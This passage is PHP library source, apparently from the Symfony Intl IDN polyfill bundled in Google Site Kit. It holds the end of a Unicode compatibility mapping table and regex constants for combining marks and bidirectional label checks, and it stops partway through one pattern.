12864 => '(祭)', 12865 => '(休)', 12866 => '(自)', 12867 => '(至)', 64297 => '+', 64606 => ' ٌّ', 64607 => ' ٍّ', 64608 => ' َّ', 64609 => ' ُّ', 64610 => ' ِّ', 64611 => ' ّٰ', 65018 => 'صلى الله عليه وسلم', 65019 => 'جل جلاله', 65040 => ',', 65043 => ':', 65044 => ';', 65045 => '!', 65046 => '?', 65075 => '_', 65076 => '_', 65077 => '(', 65078 => ')', 65079 => '{', 65080 => '}', 65095 => '[', 65096 => ']', 65097 => ' ̅', 65098 => ' ̅', 65099 => ' ̅', 65100 => ' ̅', 65101 => '_', 65102 => '_', 65103 => '_', 65104 => ',', 65108 => ';', 65109 => ':', 65110 => '?', 65111 => '!', 65113 => '(', 65114 => ')', 65115 => '{', 65116 => '}', 65119 => '#', 65120 => '&', 65121 => '*', 65122 => '+', 65124 => '<', 65125 => '>', 65126 => '=', 65128 => '\\', 65129 => '$', 65130 => '%', 65131 => '@', 65136 => ' ً', 65138 => ' ٌ', 65140 => ' ٍ', 65142 => ' َ', 65144 => ' ُ', 65146 => ' ِ', 65148 => ' ّ', 65150 => ' ْ', 65281 => '!', 65282 => '"', 65283 => '#', 65284 => '$', 65285 => '%', 65286 => '&', 65287 => '\'', 65288 => '(', 65289 => ')', 65290 => '*', 65291 => '+', 65292 => ',', 65295 => '/', 65306 => ':', 65307 => ';', 65308 => '<', 65309 => '=', 65310 => '>', 65311 => '?', 65312 => '@', 65339 => '[', 65340 => '\\', 65341 => ']', 65342 => '^', 65343 => '_', 65344 => '`', 65371 => '{', 65372 => '|', 65373 => '}', 65374 => '~', 65507 => ' ̄', 127233 => '0,', 127234 => '1,', 127235 => '2,', 127236 => '3,', 127237 => '4,', 127238 => '5,', 127239 => '6,', 127240 => '7,', 127241 => '8,', 127242 => '9,', 127248 => '(a)', 127249 => '(b)', 127250 => '(c)', 127251 => '(d)', 127252 => '(e)', 127253 => '(f)', 127254 => '(g)', 127255 => '(h)', 127256 => '(i)', 127257 => '(j)', 127258 => '(k)', 127259 => '(l)', 127260 => '(m)', 127261 => '(n)', 127262 => '(o)', 127263 => '(p)', 127264 => '(q)', 127265 => '(r)', 127266 => '(s)', 127267 => '(t)', 127268 => '(u)', 127269 => '(v)', 127270 => '(w)', 127271 => '(x)', 127272 => '(y)', 127273 => '(z)'); <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Idn\Resources\unidata; /** * @internal */ final class Regex { const COMBINING_MARK = '/^[\\x{0300}-\\x{036F}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{0591}-\\x{05BD}\\x{05BF}\\x{05C1}-\\x{05C2}\\x{05C4}-\\x{05C5}\\x{05C7}\\x{0610}-\\x{061A}\\x{064B}-\\x{065F}\\x{0670}\\x{06D6}-\\x{06DC}\\x{06DF}-\\x{06E4}\\x{06E7}-\\x{06E8}\\x{06EA}-\\x{06ED}\\x{0711}\\x{0730}-\\x{074A}\\x{07A6}-\\x{07B0}\\x{07EB}-\\x{07F3}\\x{07FD}\\x{0816}-\\x{0819}\\x{081B}-\\x{0823}\\x{0825}-\\x{0827}\\x{0829}-\\x{082D}\\x{0859}-\\x{085B}\\x{08D3}-\\x{08E1}\\x{08E3}-\\x{0902}\\x{0903}\\x{093A}\\x{093B}\\x{093C}\\x{093E}-\\x{0940}\\x{0941}-\\x{0948}\\x{0949}-\\x{094C}\\x{094D}\\x{094E}-\\x{094F}\\x{0951}-\\x{0957}\\x{0962}-\\x{0963}\\x{0981}\\x{0982}-\\x{0983}\\x{09BC}\\x{09BE}-\\x{09C0}\\x{09C1}-\\x{09C4}\\x{09C7}-\\x{09C8}\\x{09CB}-\\x{09CC}\\x{09CD}\\x{09D7}\\x{09E2}-\\x{09E3}\\x{09FE}\\x{0A01}-\\x{0A02}\\x{0A03}\\x{0A3C}\\x{0A3E}-\\x{0A40}\\x{0A41}-\\x{0A42}\\x{0A47}-\\x{0A48}\\x{0A4B}-\\x{0A4D}\\x{0A51}\\x{0A70}-\\x{0A71}\\x{0A75}\\x{0A81}-\\x{0A82}\\x{0A83}\\x{0ABC}\\x{0ABE}-\\x{0AC0}\\x{0AC1}-\\x{0AC5}\\x{0AC7}-\\x{0AC8}\\x{0AC9}\\x{0ACB}-\\x{0ACC}\\x{0ACD}\\x{0AE2}-\\x{0AE3}\\x{0AFA}-\\x{0AFF}\\x{0B01}\\x{0B02}-\\x{0B03}\\x{0B3C}\\x{0B3E}\\x{0B3F}\\x{0B40}\\x{0B41}-\\x{0B44}\\x{0B47}-\\x{0B48}\\x{0B4B}-\\x{0B4C}\\x{0B4D}\\x{0B55}-\\x{0B56}\\x{0B57}\\x{0B62}-\\x{0B63}\\x{0B82}\\x{0BBE}-\\x{0BBF}\\x{0BC0}\\x{0BC1}-\\x{0BC2}\\x{0BC6}-\\x{0BC8}\\x{0BCA}-\\x{0BCC}\\x{0BCD}\\x{0BD7}\\x{0C00}\\x{0C01}-\\x{0C03}\\x{0C04}\\x{0C3E}-\\x{0C40}\\x{0C41}-\\x{0C44}\\x{0C46}-\\x{0C48}\\x{0C4A}-\\x{0C4D}\\x{0C55}-\\x{0C56}\\x{0C62}-\\x{0C63}\\x{0C81}\\x{0C82}-\\x{0C83}\\x{0CBC}\\x{0CBE}\\x{0CBF}\\x{0CC0}-\\x{0CC4}\\x{0CC6}\\x{0CC7}-\\x{0CC8}\\x{0CCA}-\\x{0CCB}\\x{0CCC}-\\x{0CCD}\\x{0CD5}-\\x{0CD6}\\x{0CE2}-\\x{0CE3}\\x{0D00}-\\x{0D01}\\x{0D02}-\\x{0D03}\\x{0D3B}-\\x{0D3C}\\x{0D3E}-\\x{0D40}\\x{0D41}-\\x{0D44}\\x{0D46}-\\x{0D48}\\x{0D4A}-\\x{0D4C}\\x{0D4D}\\x{0D57}\\x{0D62}-\\x{0D63}\\x{0D81}\\x{0D82}-\\x{0D83}\\x{0DCA}\\x{0DCF}-\\x{0DD1}\\x{0DD2}-\\x{0DD4}\\x{0DD6}\\x{0DD8}-\\x{0DDF}\\x{0DF2}-\\x{0DF3}\\x{0E31}\\x{0E34}-\\x{0E3A}\\x{0E47}-\\x{0E4E}\\x{0EB1}\\x{0EB4}-\\x{0EBC}\\x{0EC8}-\\x{0ECD}\\x{0F18}-\\x{0F19}\\x{0F35}\\x{0F37}\\x{0F39}\\x{0F3E}-\\x{0F3F}\\x{0F71}-\\x{0F7E}\\x{0F7F}\\x{0F80}-\\x{0F84}\\x{0F86}-\\x{0F87}\\x{0F8D}-\\x{0F97}\\x{0F99}-\\x{0FBC}\\x{0FC6}\\x{102B}-\\x{102C}\\x{102D}-\\x{1030}\\x{1031}\\x{1032}-\\x{1037}\\x{1038}\\x{1039}-\\x{103A}\\x{103B}-\\x{103C}\\x{103D}-\\x{103E}\\x{1056}-\\x{1057}\\x{1058}-\\x{1059}\\x{105E}-\\x{1060}\\x{1062}-\\x{1064}\\x{1067}-\\x{106D}\\x{1071}-\\x{1074}\\x{1082}\\x{1083}-\\x{1084}\\x{1085}-\\x{1086}\\x{1087}-\\x{108C}\\x{108D}\\x{108F}\\x{109A}-\\x{109C}\\x{109D}\\x{135D}-\\x{135F}\\x{1712}-\\x{1714}\\x{1732}-\\x{1734}\\x{1752}-\\x{1753}\\x{1772}-\\x{1773}\\x{17B4}-\\x{17B5}\\x{17B6}\\x{17B7}-\\x{17BD}\\x{17BE}-\\x{17C5}\\x{17C6}\\x{17C7}-\\x{17C8}\\x{17C9}-\\x{17D3}\\x{17DD}\\x{180B}-\\x{180D}\\x{1885}-\\x{1886}\\x{18A9}\\x{1920}-\\x{1922}\\x{1923}-\\x{1926}\\x{1927}-\\x{1928}\\x{1929}-\\x{192B}\\x{1930}-\\x{1931}\\x{1932}\\x{1933}-\\x{1938}\\x{1939}-\\x{193B}\\x{1A17}-\\x{1A18}\\x{1A19}-\\x{1A1A}\\x{1A1B}\\x{1A55}\\x{1A56}\\x{1A57}\\x{1A58}-\\x{1A5E}\\x{1A60}\\x{1A61}\\x{1A62}\\x{1A63}-\\x{1A64}\\x{1A65}-\\x{1A6C}\\x{1A6D}-\\x{1A72}\\x{1A73}-\\x{1A7C}\\x{1A7F}\\x{1AB0}-\\x{1ABD}\\x{1ABE}\\x{1ABF}-\\x{1AC0}\\x{1B00}-\\x{1B03}\\x{1B04}\\x{1B34}\\x{1B35}\\x{1B36}-\\x{1B3A}\\x{1B3B}\\x{1B3C}\\x{1B3D}-\\x{1B41}\\x{1B42}\\x{1B43}-\\x{1B44}\\x{1B6B}-\\x{1B73}\\x{1B80}-\\x{1B81}\\x{1B82}\\x{1BA1}\\x{1BA2}-\\x{1BA5}\\x{1BA6}-\\x{1BA7}\\x{1BA8}-\\x{1BA9}\\x{1BAA}\\x{1BAB}-\\x{1BAD}\\x{1BE6}\\x{1BE7}\\x{1BE8}-\\x{1BE9}\\x{1BEA}-\\x{1BEC}\\x{1BED}\\x{1BEE}\\x{1BEF}-\\x{1BF1}\\x{1BF2}-\\x{1BF3}\\x{1C24}-\\x{1C2B}\\x{1C2C}-\\x{1C33}\\x{1C34}-\\x{1C35}\\x{1C36}-\\x{1C37}\\x{1CD0}-\\x{1CD2}\\x{1CD4}-\\x{1CE0}\\x{1CE1}\\x{1CE2}-\\x{1CE8}\\x{1CED}\\x{1CF4}\\x{1CF7}\\x{1CF8}-\\x{1CF9}\\x{1DC0}-\\x{1DF9}\\x{1DFB}-\\x{1DFF}\\x{20D0}-\\x{20DC}\\x{20DD}-\\x{20E0}\\x{20E1}\\x{20E2}-\\x{20E4}\\x{20E5}-\\x{20F0}\\x{2CEF}-\\x{2CF1}\\x{2D7F}\\x{2DE0}-\\x{2DFF}\\x{302A}-\\x{302D}\\x{302E}-\\x{302F}\\x{3099}-\\x{309A}\\x{A66F}\\x{A670}-\\x{A672}\\x{A674}-\\x{A67D}\\x{A69E}-\\x{A69F}\\x{A6F0}-\\x{A6F1}\\x{A802}\\x{A806}\\x{A80B}\\x{A823}-\\x{A824}\\x{A825}-\\x{A826}\\x{A827}\\x{A82C}\\x{A880}-\\x{A881}\\x{A8B4}-\\x{A8C3}\\x{A8C4}-\\x{A8C5}\\x{A8E0}-\\x{A8F1}\\x{A8FF}\\x{A926}-\\x{A92D}\\x{A947}-\\x{A951}\\x{A952}-\\x{A953}\\x{A980}-\\x{A982}\\x{A983}\\x{A9B3}\\x{A9B4}-\\x{A9B5}\\x{A9B6}-\\x{A9B9}\\x{A9BA}-\\x{A9BB}\\x{A9BC}-\\x{A9BD}\\x{A9BE}-\\x{A9C0}\\x{A9E5}\\x{AA29}-\\x{AA2E}\\x{AA2F}-\\x{AA30}\\x{AA31}-\\x{AA32}\\x{AA33}-\\x{AA34}\\x{AA35}-\\x{AA36}\\x{AA43}\\x{AA4C}\\x{AA4D}\\x{AA7B}\\x{AA7C}\\x{AA7D}\\x{AAB0}\\x{AAB2}-\\x{AAB4}\\x{AAB7}-\\x{AAB8}\\x{AABE}-\\x{AABF}\\x{AAC1}\\x{AAEB}\\x{AAEC}-\\x{AAED}\\x{AAEE}-\\x{AAEF}\\x{AAF5}\\x{AAF6}\\x{ABE3}-\\x{ABE4}\\x{ABE5}\\x{ABE6}-\\x{ABE7}\\x{ABE8}\\x{ABE9}-\\x{ABEA}\\x{ABEC}\\x{ABED}\\x{FB1E}\\x{FE00}-\\x{FE0F}\\x{FE20}-\\x{FE2F}\\x{101FD}\\x{102E0}\\x{10376}-\\x{1037A}\\x{10A01}-\\x{10A03}\\x{10A05}-\\x{10A06}\\x{10A0C}-\\x{10A0F}\\x{10A38}-\\x{10A3A}\\x{10A3F}\\x{10AE5}-\\x{10AE6}\\x{10D24}-\\x{10D27}\\x{10EAB}-\\x{10EAC}\\x{10F46}-\\x{10F50}\\x{11000}\\x{11001}\\x{11002}\\x{11038}-\\x{11046}\\x{1107F}-\\x{11081}\\x{11082}\\x{110B0}-\\x{110B2}\\x{110B3}-\\x{110B6}\\x{110B7}-\\x{110B8}\\x{110B9}-\\x{110BA}\\x{11100}-\\x{11102}\\x{11127}-\\x{1112B}\\x{1112C}\\x{1112D}-\\x{11134}\\x{11145}-\\x{11146}\\x{11173}\\x{11180}-\\x{11181}\\x{11182}\\x{111B3}-\\x{111B5}\\x{111B6}-\\x{111BE}\\x{111BF}-\\x{111C0}\\x{111C9}-\\x{111CC}\\x{111CE}\\x{111CF}\\x{1122C}-\\x{1122E}\\x{1122F}-\\x{11231}\\x{11232}-\\x{11233}\\x{11234}\\x{11235}\\x{11236}-\\x{11237}\\x{1123E}\\x{112DF}\\x{112E0}-\\x{112E2}\\x{112E3}-\\x{112EA}\\x{11300}-\\x{11301}\\x{11302}-\\x{11303}\\x{1133B}-\\x{1133C}\\x{1133E}-\\x{1133F}\\x{11340}\\x{11341}-\\x{11344}\\x{11347}-\\x{11348}\\x{1134B}-\\x{1134D}\\x{11357}\\x{11362}-\\x{11363}\\x{11366}-\\x{1136C}\\x{11370}-\\x{11374}\\x{11435}-\\x{11437}\\x{11438}-\\x{1143F}\\x{11440}-\\x{11441}\\x{11442}-\\x{11444}\\x{11445}\\x{11446}\\x{1145E}\\x{114B0}-\\x{114B2}\\x{114B3}-\\x{114B8}\\x{114B9}\\x{114BA}\\x{114BB}-\\x{114BE}\\x{114BF}-\\x{114C0}\\x{114C1}\\x{114C2}-\\x{114C3}\\x{115AF}-\\x{115B1}\\x{115B2}-\\x{115B5}\\x{115B8}-\\x{115BB}\\x{115BC}-\\x{115BD}\\x{115BE}\\x{115BF}-\\x{115C0}\\x{115DC}-\\x{115DD}\\x{11630}-\\x{11632}\\x{11633}-\\x{1163A}\\x{1163B}-\\x{1163C}\\x{1163D}\\x{1163E}\\x{1163F}-\\x{11640}\\x{116AB}\\x{116AC}\\x{116AD}\\x{116AE}-\\x{116AF}\\x{116B0}-\\x{116B5}\\x{116B6}\\x{116B7}\\x{1171D}-\\x{1171F}\\x{11720}-\\x{11721}\\x{11722}-\\x{11725}\\x{11726}\\x{11727}-\\x{1172B}\\x{1182C}-\\x{1182E}\\x{1182F}-\\x{11837}\\x{11838}\\x{11839}-\\x{1183A}\\x{11930}-\\x{11935}\\x{11937}-\\x{11938}\\x{1193B}-\\x{1193C}\\x{1193D}\\x{1193E}\\x{11940}\\x{11942}\\x{11943}\\x{119D1}-\\x{119D3}\\x{119D4}-\\x{119D7}\\x{119DA}-\\x{119DB}\\x{119DC}-\\x{119DF}\\x{119E0}\\x{119E4}\\x{11A01}-\\x{11A0A}\\x{11A33}-\\x{11A38}\\x{11A39}\\x{11A3B}-\\x{11A3E}\\x{11A47}\\x{11A51}-\\x{11A56}\\x{11A57}-\\x{11A58}\\x{11A59}-\\x{11A5B}\\x{11A8A}-\\x{11A96}\\x{11A97}\\x{11A98}-\\x{11A99}\\x{11C2F}\\x{11C30}-\\x{11C36}\\x{11C38}-\\x{11C3D}\\x{11C3E}\\x{11C3F}\\x{11C92}-\\x{11CA7}\\x{11CA9}\\x{11CAA}-\\x{11CB0}\\x{11CB1}\\x{11CB2}-\\x{11CB3}\\x{11CB4}\\x{11CB5}-\\x{11CB6}\\x{11D31}-\\x{11D36}\\x{11D3A}\\x{11D3C}-\\x{11D3D}\\x{11D3F}-\\x{11D45}\\x{11D47}\\x{11D8A}-\\x{11D8E}\\x{11D90}-\\x{11D91}\\x{11D93}-\\x{11D94}\\x{11D95}\\x{11D96}\\x{11D97}\\x{11EF3}-\\x{11EF4}\\x{11EF5}-\\x{11EF6}\\x{16AF0}-\\x{16AF4}\\x{16B30}-\\x{16B36}\\x{16F4F}\\x{16F51}-\\x{16F87}\\x{16F8F}-\\x{16F92}\\x{16FE4}\\x{16FF0}-\\x{16FF1}\\x{1BC9D}-\\x{1BC9E}\\x{1D165}-\\x{1D166}\\x{1D167}-\\x{1D169}\\x{1D16D}-\\x{1D172}\\x{1D17B}-\\x{1D182}\\x{1D185}-\\x{1D18B}\\x{1D1AA}-\\x{1D1AD}\\x{1D242}-\\x{1D244}\\x{1DA00}-\\x{1DA36}\\x{1DA3B}-\\x{1DA6C}\\x{1DA75}\\x{1DA84}\\x{1DA9B}-\\x{1DA9F}\\x{1DAA1}-\\x{1DAAF}\\x{1E000}-\\x{1E006}\\x{1E008}-\\x{1E018}\\x{1E01B}-\\x{1E021}\\x{1E023}-\\x{1E024}\\x{1E026}-\\x{1E02A}\\x{1E130}-\\x{1E136}\\x{1E2EC}-\\x{1E2EF}\\x{1E8D0}-\\x{1E8D6}\\x{1E944}-\\x{1E94A}\\x{E0100}-\\x{E01EF}]/u'; const RTL_LABEL = '/[\\x{0590}\\x{05BE}\\x{05C0}\\x{05C3}\\x{05C6}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0608}\\x{060B}\\x{060D}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{0660}-\\x{0669}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06DD}\\x{06E5}-\\x{06E6}\\x{06EE}-\\x{06EF}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0712}-\\x{072F}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07F4}-\\x{07F5}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{081A}\\x{0824}\\x{0828}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{089F}\\x{08A0}-\\x{08B4}\\x{08B5}\\x{08B6}-\\x{08C7}\\x{08C8}-\\x{08D2}\\x{08E2}\\x{200F}\\x{FB1D}\\x{FB1F}-\\x{FB28}\\x{FB2A}-\\x{FB36}\\x{FB37}\\x{FB38}-\\x{FB3C}\\x{FB3D}\\x{FB3E}\\x{FB3F}\\x{FB40}-\\x{FB41}\\x{FB42}\\x{FB43}-\\x{FB44}\\x{FB45}\\x{FB46}-\\x{FB4F}\\x{FB50}-\\x{FBB1}\\x{FBB2}-\\x{FBC1}\\x{FBC2}-\\x{FBD2}\\x{FBD3}-\\x{FD3D}\\x{FD40}-\\x{FD4F}\\x{FD50}-\\x{FD8F}\\x{FD90}-\\x{FD91}\\x{FD92}-\\x{FDC7}\\x{FDC8}-\\x{FDCF}\\x{FDF0}-\\x{FDFB}\\x{FDFC}\\x{FDFE}-\\x{FDFF}\\x{FE70}-\\x{FE74}\\x{FE75}\\x{FE76}-\\x{FEFC}\\x{FEFD}-\\x{FEFE}\\x{10800}-\\x{10805}\\x{10806}-\\x{10807}\\x{10808}\\x{10809}\\x{1080A}-\\x{10835}\\x{10836}\\x{10837}-\\x{10838}\\x{10839}-\\x{1083B}\\x{1083C}\\x{1083D}-\\x{1083E}\\x{1083F}-\\x{10855}\\x{10856}\\x{10857}\\x{10858}-\\x{1085F}\\x{10860}-\\x{10876}\\x{10877}-\\x{10878}\\x{10879}-\\x{1087F}\\x{10880}-\\x{1089E}\\x{1089F}-\\x{108A6}\\x{108A7}-\\x{108AF}\\x{108B0}-\\x{108DF}\\x{108E0}-\\x{108F2}\\x{108F3}\\x{108F4}-\\x{108F5}\\x{108F6}-\\x{108FA}\\x{108FB}-\\x{108FF}\\x{10900}-\\x{10915}\\x{10916}-\\x{1091B}\\x{1091C}-\\x{1091E}\\x{10920}-\\x{10939}\\x{1093A}-\\x{1093E}\\x{1093F}\\x{10940}-\\x{1097F}\\x{10980}-\\x{109B7}\\x{109B8}-\\x{109BB}\\x{109BC}-\\x{109BD}\\x{109BE}-\\x{109BF}\\x{109C0}-\\x{109CF}\\x{109D0}-\\x{109D1}\\x{109D2}-\\x{109FF}\\x{10A00}\\x{10A04}\\x{10A07}-\\x{10A0B}\\x{10A10}-\\x{10A13}\\x{10A14}\\x{10A15}-\\x{10A17}\\x{10A18}\\x{10A19}-\\x{10A35}\\x{10A36}-\\x{10A37}\\x{10A3B}-\\x{10A3E}\\x{10A40}-\\x{10A48}\\x{10A49}-\\x{10A4F}\\x{10A50}-\\x{10A58}\\x{10A59}-\\x{10A5F}\\x{10A60}-\\x{10A7C}\\x{10A7D}-\\x{10A7E}\\x{10A7F}\\x{10A80}-\\x{10A9C}\\x{10A9D}-\\x{10A9F}\\x{10AA0}-\\x{10ABF}\\x{10AC0}-\\x{10AC7}\\x{10AC8}\\x{10AC9}-\\x{10AE4}\\x{10AE7}-\\x{10AEA}\\x{10AEB}-\\x{10AEF}\\x{10AF0}-\\x{10AF6}\\x{10AF7}-\\x{10AFF}\\x{10B00}-\\x{10B35}\\x{10B36}-\\x{10B38}\\x{10B40}-\\x{10B55}\\x{10B56}-\\x{10B57}\\x{10B58}-\\x{10B5F}\\x{10B60}-\\x{10B72}\\x{10B73}-\\x{10B77}\\x{10B78}-\\x{10B7F}\\x{10B80}-\\x{10B91}\\x{10B92}-\\x{10B98}\\x{10B99}-\\x{10B9C}\\x{10B9D}-\\x{10BA8}\\x{10BA9}-\\x{10BAF}\\x{10BB0}-\\x{10BFF}\\x{10C00}-\\x{10C48}\\x{10C49}-\\x{10C7F}\\x{10C80}-\\x{10CB2}\\x{10CB3}-\\x{10CBF}\\x{10CC0}-\\x{10CF2}\\x{10CF3}-\\x{10CF9}\\x{10CFA}-\\x{10CFF}\\x{10D00}-\\x{10D23}\\x{10D28}-\\x{10D2F}\\x{10D30}-\\x{10D39}\\x{10D3A}-\\x{10D3F}\\x{10D40}-\\x{10E5F}\\x{10E60}-\\x{10E7E}\\x{10E7F}\\x{10E80}-\\x{10EA9}\\x{10EAA}\\x{10EAD}\\x{10EAE}-\\x{10EAF}\\x{10EB0}-\\x{10EB1}\\x{10EB2}-\\x{10EFF}\\x{10F00}-\\x{10F1C}\\x{10F1D}-\\x{10F26}\\x{10F27}\\x{10F28}-\\x{10F2F}\\x{10F30}-\\x{10F45}\\x{10F51}-\\x{10F54}\\x{10F55}-\\x{10F59}\\x{10F5A}-\\x{10F6F}\\x{10F70}-\\x{10FAF}\\x{10FB0}-\\x{10FC4}\\x{10FC5}-\\x{10FCB}\\x{10FCC}-\\x{10FDF}\\x{10FE0}-\\x{10FF6}\\x{10FF7}-\\x{10FFF}\\x{1E800}-\\x{1E8C4}\\x{1E8C5}-\\x{1E8C6}\\x{1E8C7}-\\x{1E8CF}\\x{1E8D7}-\\x{1E8FF}\\x{1E900}-\\x{1E943}\\x{1E94B}\\x{1E94C}-\\x{1E94F}\\x{1E950}-\\x{1E959}\\x{1E95A}-\\x{1E95D}\\x{1E95E}-\\x{1E95F}\\x{1E960}-\\x{1EC6F}\\x{1EC70}\\x{1EC71}-\\x{1ECAB}\\x{1ECAC}\\x{1ECAD}-\\x{1ECAF}\\x{1ECB0}\\x{1ECB1}-\\x{1ECB4}\\x{1ECB5}-\\x{1ECBF}\\x{1ECC0}-\\x{1ECFF}\\x{1ED00}\\x{1ED01}-\\x{1ED2D}\\x{1ED2E}\\x{1ED2F}-\\x{1ED3D}\\x{1ED3E}-\\x{1ED4F}\\x{1ED50}-\\x{1EDFF}\\x{1EE00}-\\x{1EE03}\\x{1EE04}\\x{1EE05}-\\x{1EE1F}\\x{1EE20}\\x{1EE21}-\\x{1EE22}\\x{1EE23}\\x{1EE24}\\x{1EE25}-\\x{1EE26}\\x{1EE27}\\x{1EE28}\\x{1EE29}-\\x{1EE32}\\x{1EE33}\\x{1EE34}-\\x{1EE37}\\x{1EE38}\\x{1EE39}\\x{1EE3A}\\x{1EE3B}\\x{1EE3C}-\\x{1EE41}\\x{1EE42}\\x{1EE43}-\\x{1EE46}\\x{1EE47}\\x{1EE48}\\x{1EE49}\\x{1EE4A}\\x{1EE4B}\\x{1EE4C}\\x{1EE4D}-\\x{1EE4F}\\x{1EE50}\\x{1EE51}-\\x{1EE52}\\x{1EE53}\\x{1EE54}\\x{1EE55}-\\x{1EE56}\\x{1EE57}\\x{1EE58}\\x{1EE59}\\x{1EE5A}\\x{1EE5B}\\x{1EE5C}\\x{1EE5D}\\x{1EE5E}\\x{1EE5F}\\x{1EE60}\\x{1EE61}-\\x{1EE62}\\x{1EE63}\\x{1EE64}\\x{1EE65}-\\x{1EE66}\\x{1EE67}-\\x{1EE6A}\\x{1EE6B}\\x{1EE6C}-\\x{1EE72}\\x{1EE73}\\x{1EE74}-\\x{1EE77}\\x{1EE78}\\x{1EE79}-\\x{1EE7C}\\x{1EE7D}\\x{1EE7E}\\x{1EE7F}\\x{1EE80}-\\x{1EE89}\\x{1EE8A}\\x{1EE8B}-\\x{1EE9B}\\x{1EE9C}-\\x{1EEA0}\\x{1EEA1}-\\x{1EEA3}\\x{1EEA4}\\x{1EEA5}-\\x{1EEA9}\\x{1EEAA}\\x{1EEAB}-\\x{1EEBB}\\x{1EEBC}-\\x{1EEEF}\\x{1EEF2}-\\x{1EEFF}\\x{1EF00}-\\x{1EFFF}]/u'; const BIDI_STEP_1_LTR = '/^[^\\x{0000}-\\x{0008}\\x{0009}\\x{000A}\\x{000B}\\x{000C}\\x{000D}\\x{000E}-\\x{001B}\\x{001C}-\\x{001E}\\x{001F}\\x{0020}\\x{0021}-\\x{0022}\\x{0023}\\x{0024}\\x{0025}\\x{0026}-\\x{0027}\\x{0028}\\x{0029}\\x{002A}\\x{002B}\\x{002C}\\x{002D}\\x{002E}-\\x{002F}\\x{0030}-\\x{0039}\\x{003A}\\x{003B}\\x{003C}-\\x{003E}\\x{003F}-\\x{0040}\\x{005B}\\x{005C}\\x{005D}\\x{005E}\\x{005F}\\x{0060}\\x{007B}\\x{007C}\\x{007D}\\x{007E}\\x{007F}-\\x{0084}\\x{0085}\\x{0086}-\\x{009F}\\x{00A0}\\x{00A1}\\x{00A2}-\\x{00A5}\\x{00A6}\\x{00A7}\\x{00A8}\\x{00A9}\\x{00AB}\\x{00AC}\\x{00AD}\\x{00AE}\\x{00AF}\\x{00B0}\\x{00B1}\\x{00B2}-\\x{00B3}\\x{00B4}\\x{00B6}-\\x{00B7}\\x{00B8}\\x{00B9}\\x{00BB}\\x{00BC}-\\x{00BE}\\x{00BF}\\x{00D7}\\x{00F7}\\x{02B9}-\\x{02BA}\\x{02C2}-\\x{02C5}\\x{02C6}-\\x{02CF}\\x{02D2}-\\x{02DF}\\x{02E5}-\\x{02EB}\\x{02EC}\\x{02ED}\\x{02EF}-\\x{02FF}\\x{0300}-\\x{036F}\\x{0374}\\x{0375}\\x{037E}\\x{0384}-\\x{0385}\\x{0387}\\x{03F6}\\x{0483}-\\x{0487}\\x{0488}-\\x{0489}\\x{058A}\\x{058D}-\\x{058E}\\x{058F}\\x{0590}\\x{0591}-\\x{05BD}\\x{05BE}\\x{05BF}\\x{05C0}\\x{05C1}-\\x{05C2}\\x{05C3}\\x{05C4}-\\x{05C5}\\x{05C6}\\x{05C7}\\x{05C8}-\\x{05CF}\\x{05D0}-\\x{05EA}\\x{05EB}-\\x{05EE}\\x{05EF}-\\x{05F2}\\x{05F3}-\\x{05F4}\\x{05F5}-\\x{05FF}\\x{0600}-\\x{0605}\\x{0606}-\\x{0607}\\x{0608}\\x{0609}-\\x{060A}\\x{060B}\\x{060C}\\x{060D}\\x{060E}-\\x{060F}\\x{0610}-\\x{061A}\\x{061B}\\x{061C}\\x{061D}\\x{061E}-\\x{061F}\\x{0620}-\\x{063F}\\x{0640}\\x{0641}-\\x{064A}\\x{064B}-\\x{065F}\\x{0660}-\\x{0669}\\x{066A}\\x{066B}-\\x{066C}\\x{066D}\\x{066E}-\\x{066F}\\x{0670}\\x{0671}-\\x{06D3}\\x{06D4}\\x{06D5}\\x{06D6}-\\x{06DC}\\x{06DD}\\x{06DE}\\x{06DF}-\\x{06E4}\\x{06E5}-\\x{06E6}\\x{06E7}-\\x{06E8}\\x{06E9}\\x{06EA}-\\x{06ED}\\x{06EE}-\\x{06EF}\\x{06F0}-\\x{06F9}\\x{06FA}-\\x{06FC}\\x{06FD}-\\x{06FE}\\x{06FF}\\x{0700}-\\x{070D}\\x{070E}\\x{070F}\\x{0710}\\x{0711}\\x{0712}-\\x{072F}\\x{0730}-\\x{074A}\\x{074B}-\\x{074C}\\x{074D}-\\x{07A5}\\x{07A6}-\\x{07B0}\\x{07B1}\\x{07B2}-\\x{07BF}\\x{07C0}-\\x{07C9}\\x{07CA}-\\x{07EA}\\x{07EB}-\\x{07F3}\\x{07F4}-\\x{07F5}\\x{07F6}\\x{07F7}-\\x{07F9}\\x{07FA}\\x{07FB}-\\x{07FC}\\x{07FD}\\x{07FE}-\\x{07FF}\\x{0800}-\\x{0815}\\x{0816}-\\x{0819}\\x{081A}\\x{081B}-\\x{0823}\\x{0824}\\x{0825}-\\x{0827}\\x{0828}\\x{0829}-\\x{082D}\\x{082E}-\\x{082F}\\x{0830}-\\x{083E}\\x{083F}\\x{0840}-\\x{0858}\\x{0859}-\\x{085B}\\x{085C}-\\x{085D}\\x{085E}\\x{085F}\\x{0860}-\\x{086A}\\x{086B}-\\x{086F}\\x{0870}-\\x{